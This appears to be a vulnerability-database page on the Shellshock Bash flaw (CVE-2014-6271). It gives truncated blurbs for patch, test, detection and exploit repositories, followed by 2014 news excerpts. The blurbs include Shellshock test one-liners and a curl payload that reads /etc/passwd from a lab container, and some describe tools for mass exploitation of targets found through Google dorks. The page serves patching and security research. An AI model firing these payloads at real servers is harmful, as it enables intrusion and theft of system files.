Shellshock ( Bash CVE-2014-6271 ) Remote Command Execution Injector Overview A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables u

update Bash on Debian / Ubuntu and RedHat I copied this code from raymiiorg/s/articles/Patch_CVE-2014-6271_Shellshock_with_Ansiblehtml Thanks to Remy van Elst for writing this code I wanted to learn Ansible for a while now and want to and this example was really helpful If you want to make this work for your servers, you'll need to have an Ansible Inventory F

bash-32 for OS X 109 and 1010 NOTE WELL: This software is not applicable to 1011 unless disabling the File System Protections GNU bash for OS X Current version: 3257 NOTE: EXPERIMENTAL: functions from environment variables are NOT imported as default when the import-functions option is compiled The master branch has this option enabled, for better security You can v

Evil-Shock Description Evil-Shock is a powerful tool made to exploit Shellshock, what's special with Evil-Shock is that it doesn't base his attacks on one parameter, example another tool might inject a simple "echo Vulnerable" and see if the server executes that In many case the server wont execute that command but can execute another command ;) Evil-Shock

VulnerabilityDB Consolidation of public domain data for effective vulnerability assessment and patch management More details at [Common Sense Security(polaris-aablogspotcom/) Getting Started The dumpgz are VunlerabilityDB dump Uncompress this file and load it into mariadb or mysql to access the content Prerequisites MariaDB or MySQL server is required to load the

another_shellshock_test Some scripts to test for the "ShellShock" vulnerability (CVE-2014-6271) The codename for this scripts is SHIT (SHellshock Injection Test) harrharr Please only use this script in environments where you are allowed to shellshock_localsh Test for the two known (by me) version of this vulnerability on the local system: env x='() { :;}; ec

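KaliToolsPlus One-click installation of a collection of penetration testing tools from GitHub Place the script in the /opt directory and run it The installer includes: 1) cheat: a Linux command-line help tool with standalone examples to help understand commands; list the supported commands with cheat -l 2) masscan: a large-scale scanning tool 3) xsscapy: an XSS scanning tool 4) ufonet: a web stress-testing tool 5) Hangman: a password generator 6) ActiveScanPlusPlus: CVE-20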

bash Cookbook This cookbook keeps bash packages latest version CVE-2014-6271 seclistsorg/oss-sec/2014/q3/649 Requirements packages apt - manage packages in ubuntu and debian yum - manage packages in RHEL family Usage Just include bash in your node's run_list: { "name":"my_node", "run_list": [ "recipe[bash]" ] }

bashbug-shellshock-test This offline tool is not supported and is provided for informational purposes only This tool is dependent on Python 27 ''' ' ' Shellshock Test - CVE-2014-6271 ' Written by Tripwire VERT (wwwtripwirecom/vert) ' ' This offline tool is not supported and is provided for informational purposes only ' T

shellshock-exploit this script for exploit #cve-2014-6271, NOTE you should edit the target HTB:wwwhacktheboxeu/home/users/profile/14397 Twitter: twittercom/MoayadAlmalat

Auto Vulnerability Tester An extensible automated vulnerability testing framework written in Python3 by Nicholas Lochner for CS460 at the University of Illinois at Urbana-Champaign All code was written by Nicholas Lochner, except for "heartbleedpy", which is a modified version of the Heartbleed proof of concept by Jared Stafford The source is licensed under the GNU

kbash Exploit GNU Bash Env Command Injection via Google CVE-2014-6271 Version 21 usage Batch Exploit GNU Bash Env Command Injection base on Google Version 21 optional arguments: -h, --help show this help message and exit -u URL specific a single Target Url -d DORK Custom Google Dork,Using Google Search to find targets -t THREAD_COUNT thre

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

Pwnable Where Nick tries to hack and constantly fails No peeking, there be spoilers below! Toddler's Bottle fd #include <stdio.h> #include <stdlib.h> #include <string.h> char buf[32]; int main(int argc, char* argv[], char* envp[]){ if(argc<2){ printf("pass argv[1] a number\n"); return 0; } // Convert argv[1

RBE Remote Bash Execution This POC (proof of concept) is for EDUCATIONAL PURPOSES ONLY! Please, do not use it with wrong intents in mind We set up a simple PHP website and a Python executable that exploits the bash shellshock vulnerability Development Please note that all the following tests were done in a local controlled environment for educational purposes only Do NOT do

Project 9 - Honeypots Honeypots Deployed: I used the Modern Honey Network (MHN) to complete the assignment for Week 9 In total, I created five Ubuntu 1404 honeypots All of the honeypots, including the MHN admin web application, were hosted in the Google Cloud Honeypots: Ubuntu 1404- Dionaea with HTTP: Goal is to trap malware that exploits vulnerabilities in an exposed net

bash Some bash scripts I use Updated to include a quick test for CVE-2014-6271 (Shellshock) #!/bin/sh if [ "$SHELL" = "/bin/bash" ] then echo "You are using Bash" echo "$BASH_VERSION" env test='() { :; }; echo This version is vulnerable' bash -c 'echo ' fi I added a Wiki article that describes the settings I us

Vulnerability as a Service - CVE 2014-6271 A Debian (Wheezy) Linux system with a vulnerable version of bash and a web application to showcase CVE-2014-6271, aka Shellshock Overview This docker container is based on Debian Wheezy and has been modified to use a vulnerable version of Bash (bash_42:2b:dfsg-01) A web application is available via Apache 2 and serves a CGI scri

CVE-2014-6271_Test CVE-2014-6271_Test Obviously, this project is used to check if a server with cgi enabled is affected with CVE-2014-6271(aka shellshock) Dependency Need GoogleSearchCrawler Usage eg: python exppy -g wwwgooglecom This will test urls collected from google search result with keyword in file keywords run python exppy to see details

bashfix (for OSX) copied from StackOverflow answer here : applestackexchangecom/questions/146849/how-do-i-recompile-bash-to-avoid-shellshock-the-remote-exploit-cve-2014-6271-an/146851#146851 Usage git clone githubcom/yanicklandry/bashfixgit ~/bashfix chmod a+x ~/bashfix/bash_fixsh ~/bashfix/bash_fixsh Test After executing : env x='() { :;}; echo vulne

ShellShockAttacker ShellShockAttacker Is A Windows GUI program allows you to send ShellShock payloads to be executed in an infected server PlatForm : Windows CVE : CVE-2014-6271 License : Free Wiki

ShellShock Detector for Bro This script detects successful exploitation of the Bash vulnerability with CVE-2014-6271 nicknamed "ShellShock" It's more comprehensive than most of the detections around in that it's watching for behavior from the attacked host that might indicate successful compromise or actual vulnerability If a host is seen receiving an att

docker_CVE-2014-6271 docker build -t DOCKERIMAGENAME /path/to/dockerfile_directory docker run -it -d -p 8080:80 DOCKERIMAGENAME verify execution with: docker ps verify web server execution: localhost:8080 exploit vulnerability : curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \localhost:8080/cgi-bin/vulnerable

CVE-2014-6271 Bash vulnerables ex: env 'VAR=() { :;}; echo Bash is vulnerable!' 'FUNCTION()=() { :;}; echo Bash is vulnerable!' bash -c "echo Bash Test" i make script for u : how to use bash scannersh listofwebsitetxt

Shellshock Test ShellShock test checks for the recent CVE-2014-6271 Live : wwwdr4cun0com/shellshock/ Prerequisites : Apache Server running php If you want to use my proxy,contact me Questions and suggestions can be sent to : dhaval(at)dr4cun0com

Shellshock exploit + vulnerable environment Shellshock, also known as Bashdoor, is a family of security bugs in the widely used Unix Bash shell, the first of which was disclosed on 24 September 2014 Many Internet-facing services, such as some web server deployments, use Bash to process certain requests, allowing an attacker to cause vulnerable versions of Bash to execute arbi

Awesome Hacking A curated list of awesome Hacking Inspired by awesome-machine-learning If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20 For a list of free hacking books available for download, go here Table of Contents System Tutorials Tools Docker General Reverse Engineering Tutorials Tools General Web Tools Netwo

ShellScan ShellScan - A simple Shellshock Vulnerability Scanner in python allows cyber security researchers to explore and discover new application and systems that vulnerable to the ShellShock exploit ShellScan supports different BASH vulnerabilities: CVE-2014-6271 and CVE-2014-6278 to be tested by cyber security researchers in order to explore and discover new applications a

Detailed description and usage, see: weibocom/1363173330/BoKSHl0YE CVE-2014-6271 CVE-2014-7169 remote code execution through bash twittercom/taviso/status/514887394294652929 The official patch is unreliable; this one fixes the bypass issue. Successfully patched bash version 42

Awesome Penetration Testing A collection of awesome penetration testing resources This project is supported by Netsparker Web Application Security Scanner Penetration testing is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities Your contributions and

awesome-web-hacking This list is for anyone wishing to learn about web application security but do not have a starting point You can help by sending Pull Requests to add more information If you're not inclined to make PRs you can tweet me at @infoslack Table of Contents Books Documentation Tools Cheat Sheets Docker Vulnerabilities Courses Online Hacking Demonstration Si

Recent Articles

IT threat evolution Q3 2014
Securelist • David Emm Maria Garnaeva Victor Chebyshev Roman Unuchek Denis Makrushin Anton Ivanov • 18 Nov 2014

In July we published our in-depth analysis into a targeted attack campaign that we dubbed ‘Crouching Yeti’. This campaign is also known as ‘Energetic Bear’.
This campaign, which has been active since late 2010, has so far targeted the following sectors:  industrial/machinery, manufacturing, pharmaceutical, construction, education and information technology.  So far there have been more than 2,800 victims worldwide, and we have been able to identify 101 d...

VXers Shellshocking embedded BusyBox boxen
The Register • Darren Pauli • 17 Nov 2014

It's 2014 and some people are still using default user names and passwords

Malware writers have crafted new wares to attack embedded devices running BusyBox and not yet patched against the ShellShock vulnerability, researcher Rhena Inocencio says.
Miscreants' tool of choice for such attacks is malware called "Bashlite" that, once executed on a victim machine, probes for devices such as routers and Android phones running BusyBox to brute force logins through a preset list of usernames and passwords.
Trend Micro's Inocencio said the variant would download and...

Researcher Takes Wraps off Two Undisclosed Shellshock Vulnerabilities in Bash
Threatpost • Michael Mimoso • 03 Oct 2014

The Bash bug has kept Linux and UNIX administrators busy deploying a half-dozen patches, worrying about numerous Shellshock exploits in the wild, and laboring over a general uncertainty that the next supposed fix will break even more stuff.
Researcher Michal Zalewski, a longtime bug-hunter, has been front and center on some of the Bash research and last week said he had found two additional bugs in the Bourne Again Shell, details of which he’d kept to himself until yesterday.
Za...

VMware Begins to Patch Bash Issues Across Product Line
Threatpost • Chris Brook • 01 Oct 2014

Much like Heartbleed triggered vendors to issue out of band patches to remedy vulnerabilities that popped up earlier this year, Shellshock, the Bash vulnerability, has forced vendors’ hands in a similar fashion.
Virtualization firm VMware issued a progress report on fixes for four different types of products as they relate to the bug on Monday.
For the most part the company still has its hands full.
According to yesterday’s security advisory, it’s currently in the middle ...

Third patch brings more admin Shellshock for the battered and Bashed
The Register • Darren Pauli • 30 Sep 2014

'Okay we got it THIS time'

A third patch, from Red Hat engineer Florian Weimer, has been released for the vulnerable Bash Unix command-line interpreter, closing off flaws found in two previous fixes.
Weimer's unofficial fix was adopted upstream by Bash project maintainer Chet Ramey and released as Bash-4.3 Official Patch 27 (bash43-027) which addressed a bunch of previously undisclosed flaws including two remote exploit bugs.
The first patch (CVE-2014-6271) released Wednesday when the Shellshock flaw dropped w...

SHELLSHOCKED: Fortune 1000 outfits Bash out batches of patches
The Register • John Leyden • 29 Sep 2014

CloudPassage points to 'pervasive' threat of Bash bug

The majority of Fortune 1000 and Global 2000 companies have already deployed, or are now deploying, Shellshock patches to fend off code attacks, according to cloud security firm CloudPassage.
The Shellshock vulnerability allows remote attackers to execute arbitrary code on servers using a variety of techniques, with the CVE-2014-6271 weakness in the Bourne-Again Shell (Bash) affecting most Unix and Linux-based systems.
"The Shellshock vulnerability is one of the most pervasive threat...

Oracle SHELLSHOCKER - data titan lists unpatchables
The Register • Neil McAllister in San Francisco • 27 Sep 2014

Database kingpin lists 32 products that can't be patched (yet) as GNU fixes second vuln

Oracle has confirmed that at least 32 of its products are affected by the vulnerability recently discovered in the Bash command-line interpreter – aka the "Shellshock" bug – including some of the company's pricey integrated hardware systems.
The database giant issued a security alert regarding the issue on Friday, warning that many Oracle customers will have to wait awhile longer to receive patches.
"Oracle is still investigating this issue and will provide fixes for affected pro...

Stunned by Shellshock Bash bug? Patch all you can – or be punished
The Register • John Leyden • 26 Sep 2014

UK data watchdog rolls up its sleeves, polishes truncheon

Updated The UK's privacy watchdog is urging organisations to protect their systems against the infamous Shellshock vulnerability in Bash – even though the full scope of the security bug remains unclear.
The Shellshock flaw affects Bash up to and including version 4.3. It's a vital component of many Linux and Unix systems, as well as networking kit and embedded devices. It's also present in the latest versions of Apple's OS X for Macs.
The flaw allows hackers to execute arbitrary co...

Shellshock and its early adopters
Securelist • Stefan Ortloff • 26 Sep 2014

Shortly after disclosure of the Bash bug called “Shellshock” we saw the first attempts by criminals to take advantage of this widespread vulnerability also known as CVE-2014-6271.
The most recent attempts we see to gain control of webservers just create a new instance of bash and redirect it to a remote server listening on a specific TCP port. This is also known as a reverse-connect-shell. Here’s an example of how this attack appears in a webserver logfile:

The atta...

How to resolve Shellshock on Mac OS X, web servers and more
welivesecurity • Stephen Cobb • 25 Sep 2014

A serious software vulnerability called the “Bash Bug” or “Shellshock” has just come to light and it affects a wide range of computers and digital devices, many of which will need to be fixed to prevent them leaking information or being taken over by malicious persons. The systems affected include Mac OS X computers, many web servers, and some home networking devices like routers. This blog post offers some preliminary advice about what to do in response to Shellshock, as well as links t...

Hackers thrash Bash Shellshock bug: World races to cover hole
The Register • John Leyden • 25 Sep 2014

Update your gear now to avoid early attacks hitting the web

Sysadmins and users have been urged to patch the severe Shellshock vulnerability in Bash on Linux and Unix systems – as hackers ruthlessly exploit the flaw to compromise or crash computers.
But as "millions" of servers, PCs and devices lay vulnerable or are being updated, it's emerged the fix is incomplete.
The flaw affects the GNU Bourne Again Shell – better known as Bash – which is a widely installed command interpreter used by many Linux and Unix operating systems – includ...

“Bash” (CVE-2014-6271) vulnerability – Q&A
Securelist • GReAT • 25 Sep 2014

The “bash” vulnerability, actually described as CVE-2014-6271, is an extremely powerful vulnerability due to its high impact and the ease with which it can be exploited. An attacker can simply execute system level commands, with the same privileges as the affected services.
In most of the examples on the Internet right now, attackers are remotely attacking web servers hosting CGI scripts that have been written in bash or pass values to shell scripts.
At the time of writing, the v...

Bash Exploit Reported, First Round of Patches Incomplete
Threatpost • Michael Mimoso • 25 Sep 2014

The urgency to patch systems against the Bash zero-day vulnerability has been cranked to 10 after reports of an exploit in the wild have been made public by AusCERT, the Computer Emergency Response Team of Australia.
This seems to reflect a similar finding posted by a researcher who goes by the handle Yinette who found a malware sample that points to a bot being distributed by the exploit.
Other researchers, including David Jacoby of Kaspersky Lab, right and podcast below, and Robert...

Patch Bash NOW: 'Shellshock' bug blasts OS X, Linux systems wide open
The Register • John Leyden • 24 Sep 2014

CGI scripts to DHCP clients hit by Heartbleed-grade remote-code exec vuln

Updated A bug discovered in the widely used Bash command interpreter poses a critical security risk to Unix and Linux systems – and, thanks to their ubiquity, the internet at large.
It lands countless websites, servers, PCs, OS X Macs, various home routers, and more, in danger of hijacking by hackers.
The vulnerability is present in Bash up to and including version 4.3, and was discovered by Stephane Chazelas. It puts Apache web servers, in particular, at risk of compromise: CGI sc...

References

CWE-78